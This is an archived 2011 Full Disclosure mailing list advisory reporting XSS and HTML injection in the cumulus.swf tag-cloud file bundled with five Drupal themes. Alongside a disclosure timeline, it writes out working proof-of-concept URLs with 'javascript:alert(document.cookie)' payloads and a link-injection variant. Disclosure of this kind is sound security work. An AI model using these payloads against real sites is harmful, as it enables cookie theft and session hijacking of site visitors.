Full Disclosure mailing list archives
Vulnerability in multiple themes for Drupal
From: "MustLive" <mustlive () websecurity com ua>
Date: Sun, 2 Oct 2011 23:42:10 +0300
Hello list! The endless saga continue. After informing about a lot of vulnerable plugins and widgets with this swf-file, here is information about multiple vulnerable themes ;-). I want to warn you about Cross-Site Scripting vulnerability in multiple themes for Drupal. And a lot of other themes for Drupal and other engines can be vulnerable. This XSS is similar to XSS vulnerability in WP-Cumulus, which I've disclosed in 2009 (http://securityvulns.com/Wdocument842.html). Because these themes use cumulus.swf (it's the same tagcloud.swf made by author of WP-Cumulus). About such vulnerabilities I wrote in 2009-2011, particularly about millions of flash files tagcloud.swf which are vulnerable to XSS attacks I mentioned in my article XSS vulnerabilities in 34 millions flash files (http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2010-January/006033.html). ------------------------- Affected products: ------------------------- Vulnerable are all versions of themes Admire Grunge, Morok, Pushbutton, Danland and Analytic for Drupal. ---------- Details: ---------- XSS (WASC-08): http://site/themes/admire_grunge/cumulus.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href='javascript:alert(document.cookie)'+style='font-size:+40pt'%3EClick%20me%3C/a%3E%3C/tags%3E http://site/themes/morok/cumulus.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href='javascript:alert(document.cookie)'+style='font-size:+40pt'%3EClick%20me%3C/a%3E%3C/tags%3E http://site/themes/pushbutton/cumulus.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href='javascript:alert(document.cookie)'+style='font-size:+40pt'%3EClick%20me%3C/a%3E%3C/tags%3E http://site/sites/all/themes/danland/cumulus.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href='javascript:alert(document.cookie)'+style='font-size:+40pt'%3EClick%20me%3C/a%3E%3C/tags%3E http://site/themes/analytic/cumulus.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href='javascript:alert(document.cookie)'+style='font-size:+40pt'%3EClick%20me%3C/a%3E%3C/tags%3E Code will execute after click. It's strictly social XSS. Also it's possible to conduct (like in WP-Cumulus) HTML Injection attack. HTML Injection (WASC-12): http://site/path/cumulus.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href='http://websecurity.com.ua'+style='font-size:+40pt'%3EClick%20me%3C/a%3E%3C/tags%3E ------------------------------------------------- Fixed version of swf-file: ------------------------------------------------- All users of these and other themes, plugins and widgets (and their developers) with this swf-file could fix this issue but updating swf-file to fixed version. But as I wrote in my last advisory (http://lists.grok.org.uk/pipermail/full-disclosure/2011-September/082656.html), the developer of WP-Cumulus fixed only XSS vector, but not HTML Injection vector. So it's still possible to conduct HTML Injection attacks (for injecting arbitrary links) on all versions of this swf-file (including version with fixed XSS hole). Which should be taken into account. ------------ Timeline: ------------ 2009.11.09 - disclosed at my site about WP-Cumulus. 2009.11.11 - informed developer of WP-Cumulus. 2009.11.15 - developer of WP-Cumulus fixed XSS (but not HTML Injection). 2011.10.01 - disclosed at my site about five vulnerable themes for Drupal. And a lot of other themes for Drupal and other engines can be vulnerable. I mentioned about these vulnerabilities at my site: http://websecurity.com.ua/5407/ Best wishes & regards, MustLive Administrator of Websecurity web site http://websecurity.com.ua _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- Vulnerability in multiple themes for Drupal MustLive (Oct 02)
- <Possible follow-ups>
- Re: Vulnerability in multiple themes for Drupal Greg Knaddison (Oct 04)